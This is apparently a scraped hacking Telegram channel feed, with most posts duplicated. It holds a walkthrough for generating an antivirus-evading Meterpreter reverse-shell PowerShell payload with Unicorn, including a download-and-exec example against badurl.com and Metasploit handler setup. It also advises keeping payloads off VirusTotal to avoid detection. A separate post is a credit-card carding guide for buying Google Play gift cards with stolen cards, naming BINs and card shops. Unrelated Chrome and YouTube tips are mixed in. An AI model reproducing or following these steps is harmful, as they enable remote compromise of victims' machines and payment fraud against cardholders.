To view the available Unicorn options and comprehensive descriptions of each attack, use the ./unicorn.py --help argument.
@free_hacking_tutorial
@free_hacking_tutorial
/unicorn.py --help
-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port gtoptional hta or macro, crtlt
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py gtcobalt_strike_file.cslt cs macro
Macro Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py gtcobalt_strike_file.cslt cs hta
HTA Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py gtpath_to_payload/exe_encodelt crt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt macro 500
Cobalt Strike Example: python unicorn.py gtcobalt_strike_file.cslt cs (export CS in C# format)
Custom Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port gtoptional hta or macro, crtlt
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py gtcobalt_strike_file.cslt cs macro
Macro Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py gtcobalt_strike_file.cslt cs hta
HTA Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py gtpath_to_payload/exe_encodelt crt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt macro 500
Cobalt Strike Example: python unicorn.py gtcobalt_strike_file.cslt cs (export CS in C# format)
Custom Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
TrustedSec
Your Trusted Cybersecurity Partner | TrustedSec
Experience fundamentally different cybersecurity for business success, providing end-to-end consulting from penetration testing to design and hardening.
Step 3
Generate the Payload
To create a payload with Unicorn, use the below command.
Generate the Payload
To create a payload with Unicorn, use the below command.
./unicorn.py windows/meterpreter/reverse_https gtATTACKER-IP-ADDRESSlt gtPORTlt
Unicorn will use the Metasploit reverse_https module to connect to the attackers IP address using the specified port.
@free_hacking_tutorial
@free_hacking_tutorial
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
,/
//
,//
___ /| |//
|\_-___,-\_____--/_)' ) \
\ -_ / __ \(
\__________/(,--__ \_________. | ./ |
| \ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ (
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( ; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Nahom
@free_hacking_tutorial
Happy Magic Unicorns.
[********************************************************************************************************]
-----POWER
,/
//
,//
___ /| |//
__/\_ --(/|___/-/
\|\_-\___ __-_- /-/ \.|\_-___,-\_____--/_)' ) \
\ -_ / __ \(
( __\|\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ /_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \--, _/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ ---_ /|\__________/(,--__ \_________. | ./ |
| \ \
---_\--, \ \_,./ |
| \ \_ \ /---_______-\ \\ /
\ \.___,| / \ \\ \\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ (
_' \ |
\. \ \. \ / | |\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( ; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Nahom
@free_hacking_tutorial
Happy Magic Unicorns.
[********************************************************************************************************]
-----POWER
SHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txt command. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.
@free_hacking_tutorial
@free_hacking_tutorial
The other file created by Unicorn is unicorn.rc, a resource file which will automate the msfconsole setup and configuration.
Step 4
Start Msfconsole Using the Resource File
To start Metasploit, run the msfconsole -r /opt/unicorn/unicorn.rc command.
@free_hacking_tutorial
Start Msfconsole Using the Resource File
To start Metasploit, run the msfconsole -r /opt/unicorn/unicorn.rc command.
@free_hacking_tutorial
msfconsole -r /opt/unicorn/unicorn.rc
=[ metasploit v4.16.59-dev- ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.1.5:443
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
=[ metasploit v4.16.59-dev- ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.1.5:443
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
The resource file will automatically enable the handler (multi/handler), set the payload type (windows/meterpreter/reverse_https), set the attacker's IP address (LHOST), set the port number (LPORT), enable stager encoding (EnableStageEncoding), and start the msfconsole listener (exploit -j) — easy.
At this point, everything on the attacker's side is set up and ready for incoming connections. Now it's just a matter of verifying the payload works and effectively bypasses Windows Defender and antivirus software.
@free_hacking_tutorial
At this point, everything on the attacker's side is set up and ready for incoming connections. Now it's just a matter of verifying the payload works and effectively bypasses Windows Defender and antivirus software.
@free_hacking_tutorial
That's it for installing Metasploit, creating the PowerShell payload with Unicorn, and automating the msfconsole startup. Unicorn is a great tool which takes the difficulty out of creating sophisticated PowerShell payloads capable of bypassing popular antivirus software. In my follow up article, I'll show how to convert the PowerShell code into an executable and a few tricks for making the executable appear as an ordinary text file, so stay tuned.
@free_hacking_tutorial
@free_hacking_tutorial
Step 5
Test the Payload (Don't Upload It to VirusTotal)
In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detections in a fully patched Windows 10 Enterprise machine.
Many projects warn penetration testers of the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer's explicitly caution against using VirusTotal every time the program starts.
As someone who regularly experiments with many antivirus evasion software, I completely understand the temptation to know if the created payload will evade detection of the most popular antivirus software technologies. However, uploading to online virus scanners is extremely damaging to these projects. VirusTotal shares uploaded payloads with third-parties and, as a result, their collective detection rates dramatically increase over a short period of time.
As an alternative to online scanners, I encourage pentester's to simulate their target's operating system environment using virtual machines. For example, if it's discovered that a target on the local network is using Windows 10 with AVG or Avast, create a Windows 10 VM, install the latest antivirus software in the VM, and test payloads inside the VM. This will give pentester's some reassurance that a payload is working properly and prevent VirusTotal from over-analyzing the malicious file and sharing its results with other companies.
@free_hacking_tutorial
Test the Payload (Don't Upload It to VirusTotal)
In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detections in a fully patched Windows 10 Enterprise machine.
Many projects warn penetration testers of the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer's explicitly caution against using VirusTotal every time the program starts.
As someone who regularly experiments with many antivirus evasion software, I completely understand the temptation to know if the created payload will evade detection of the most popular antivirus software technologies. However, uploading to online virus scanners is extremely damaging to these projects. VirusTotal shares uploaded payloads with third-parties and, as a result, their collective detection rates dramatically increase over a short period of time.
As an alternative to online scanners, I encourage pentester's to simulate their target's operating system environment using virtual machines. For example, if it's discovered that a target on the local network is using Windows 10 with AVG or Avast, create a Windows 10 VM, install the latest antivirus software in the VM, and test payloads inside the VM. This will give pentester's some reassurance that a payload is working properly and prevent VirusTotal from over-analyzing the malicious file and sharing its results with other companies.
@free_hacking_tutorial
@free_hacking_tutorial
Adobe Releases Security Patch Updates For 112 Vulnerabilities
Adobe has released security patches for a total 112 vulnerabilities in its products, most of which have a higher risk of being exploited.
The vulnerabilities addressed in this month's patch Tuesday affect Adobe Flash Player, Adobe Experience Manager, Adobe Connect, Adobe Acrobat, and Reader.
None of the security vulnerabilities patched this month were either publicly disclosed or found being
@free_hacking_tutorial
Adobe Releases Security Patch Updates For 112 Vulnerabilities
Adobe has released security patches for a total 112 vulnerabilities in its products, most of which have a higher risk of being exploited.
The vulnerabilities addressed in this month's patch Tuesday affect Adobe Flash Player, Adobe Experience Manager, Adobe Connect, Adobe Acrobat, and Reader.
None of the security vulnerabilities patched this month were either publicly disclosed or found being
@free_hacking_tutorial
🎁 Google play store carding 🎁
➖➖➖➖➖➖➖➖➖➖➖➖
1.If you wanna card Google play and Google play gift card
👉 As usual clear your Cookies in browser via Ccleaner.
[According to the BIN, I have mentioned the IP below]
2. Then go to any app that is paid and below like 2$ or less , go to payment info.
3. Get your live CC from me or buy from shop like unicc, jstash etc..,
4. Bin recommended 517805,372739 ,417409 or amex gold ,capital one bank (only USA cc)
5. If you going for public cc I recommend Amex, are good for google play
❗️Even if the card dont have name and zip you can add any name and us zip because those bin are Non-AVS
[If you dont know what is Non-Avs / AVS the just click it to learn
6. Now save the card and ready to pay.
7. If the payment successful for that app,
👉 then go to buy google play credit and select your gift card 5$,10$,15$,25$ or 50$ .
8. Now all done and it will success mostly because of Non-AVS BIN.
9. Even if card declined after use, Google play never charge back and card showing declined will always work for small amount like 5$ after few weeks.
➖ @free_hacking_tutorial➖
➖➖➖➖➖➖➖➖➖➖➖➖
1.If you wanna card Google play and Google play gift card
👉 As usual clear your Cookies in browser via Ccleaner.
[According to the BIN, I have mentioned the IP below]
2. Then go to any app that is paid and below like 2$ or less , go to payment info.
3. Get your live CC from me or buy from shop like unicc, jstash etc..,
4. Bin recommended 517805,372739 ,417409 or amex gold ,capital one bank (only USA cc)
5. If you going for public cc I recommend Amex, are good for google play
❗️Even if the card dont have name and zip you can add any name and us zip because those bin are Non-AVS
[If you dont know what is Non-Avs / AVS the just click it to learn
6. Now save the card and ready to pay.
7. If the payment successful for that app,
👉 then go to buy google play credit and select your gift card 5$,10$,15$,25$ or 50$ .
8. Now all done and it will success mostly because of Non-AVS BIN.
9. Even if card declined after use, Google play never charge back and card showing declined will always work for small amount like 5$ after few weeks.
➖ @free_hacking_tutorial➖
How To Make Google Chrome Browse More Faster With These 4 Steps🤩🤩🤩
The method is very simple and we will be editing some hidden feature of chrome in this method and with that you chrome speed will boost up and it will browse webpages faster. So follow up the below methods to proceed:
#1 Method: Editing Chrome Flag Settings To Make It Faster
1. First of all open the address chrome://flags/ in your Google chrome.
2. Now there you will see lots of settings there.
3. Search out for "Maximum tiles for interest area" and change its value to 512 that is maximum RAM that you will be allocating to the Chrome.( You can use ctrl+f to find these options).
4. Now search For the "Number of raster threads" and change its value to 4.
5. Now enable "Enable fast tab/window close".
6. That's it now relaunch your browser and enjoy the faster performance of your browser.
#2 Method: Using Google Chrome Extension
1. Download and install a cool plugin
Web Boost in your Google chrome.
2. Thats it this extension will get added to your browser and you can see icon at the right top corner, just click on it to start it.
#3 Method: Changing The Settings In Google Chrome
1. First of all go to three line button at the the top right corner of your Google chrome.
2. Then click on "settings" and then "Show Advanced Settings"
.
3. Now under privacy look for "Prefetch resources to load pages more quickly" and tick on it.
4. There you will have 3 options listed in your android chrome which can be set according to as:
Always :- If you want to load pages both on cellular and wifi network.
Wifi – If only wifi connection is there then only it will load prefetch pages.
Never :- It will never prefetch pages and this can save your data on your limited connection.
#4 Method: Clearing Cache & unnecessary Plugins and Extensions
1. Type chrome://plugins/ in your google chrome and clear out or say remove the plugins that are unnecessary in your browser.
2. Type chrome://extensions/ in your chrome browser and clear all the extension that you don’t need in your browser.
3. Type chrome://settings/clearBrowserData and clear all your history from beginning including history, cache file and all other saved data of your browser to make it faster.
With these ways you can easily boost up your browser speed and can enjoy fast switching speed between tabs.
@free_hacking_tutorial
The method is very simple and we will be editing some hidden feature of chrome in this method and with that you chrome speed will boost up and it will browse webpages faster. So follow up the below methods to proceed:
#1 Method: Editing Chrome Flag Settings To Make It Faster
1. First of all open the address chrome://flags/ in your Google chrome.
2. Now there you will see lots of settings there.
3. Search out for "Maximum tiles for interest area" and change its value to 512 that is maximum RAM that you will be allocating to the Chrome.( You can use ctrl+f to find these options).
4. Now search For the "Number of raster threads" and change its value to 4.
5. Now enable "Enable fast tab/window close".
6. That's it now relaunch your browser and enjoy the faster performance of your browser.
#2 Method: Using Google Chrome Extension
1. Download and install a cool plugin
Web Boost in your Google chrome.
2. Thats it this extension will get added to your browser and you can see icon at the right top corner, just click on it to start it.
#3 Method: Changing The Settings In Google Chrome
1. First of all go to three line button at the the top right corner of your Google chrome.
2. Then click on "settings" and then "Show Advanced Settings"
.
3. Now under privacy look for "Prefetch resources to load pages more quickly" and tick on it.
4. There you will have 3 options listed in your android chrome which can be set according to as:
Always :- If you want to load pages both on cellular and wifi network.
Wifi – If only wifi connection is there then only it will load prefetch pages.
Never :- It will never prefetch pages and this can save your data on your limited connection.
#4 Method: Clearing Cache & unnecessary Plugins and Extensions
1. Type chrome://plugins/ in your google chrome and clear out or say remove the plugins that are unnecessary in your browser.
2. Type chrome://extensions/ in your chrome browser and clear all the extension that you don’t need in your browser.
3. Type chrome://settings/clearBrowserData and clear all your history from beginning including history, cache file and all other saved data of your browser to make it faster.
With these ways you can easily boost up your browser speed and can enjoy fast switching speed between tabs.
@free_hacking_tutorial
⭕YOUTUBE TRICKS⭕
Are you fond of downloading music and videos but you have problems in downloading it..Here is tricks in youtube.
1.How to download only audios of a music or video simply go to the address bar and replace "youtube" with "listentoyoutube" and paste it in your address bar to download the audio of the video.
2.To download youtube videos in any quality like mp3,mp4,3gpsimply replace "youtube" with "ssyoutube" in your browser URL and paste it in your address bar of your browser.
3.Tried of age restictions when downloading video in youtube just replace "youtube" with "nsfwyoutube" in the URL and paste it in your address bar.
4.To remove advert from your youtube.Replace "youtube" with "youtubeskip" in the url and paste it in the address bar.
5.To convert the video to graphical interweave format(gif)in youtube just replace"youtube" with "gifyoutube"
Free tutorials and lifehacks 👌👍
@free_hacking_tutorial
Are you fond of downloading music and videos but you have problems in downloading it..Here is tricks in youtube.
1.How to download only audios of a music or video simply go to the address bar and replace "youtube" with "listentoyoutube" and paste it in your address bar to download the audio of the video.
2.To download youtube videos in any quality like mp3,mp4,3gpsimply replace "youtube" with "ssyoutube" in your browser URL and paste it in your address bar of your browser.
3.Tried of age restictions when downloading video in youtube just replace "youtube" with "nsfwyoutube" in the URL and paste it in your address bar.
4.To remove advert from your youtube.Replace "youtube" with "youtubeskip" in the url and paste it in the address bar.
5.To convert the video to graphical interweave format(gif)in youtube just replace"youtube" with "gifyoutube"
Free tutorials and lifehacks 👌👍
@free_hacking_tutorial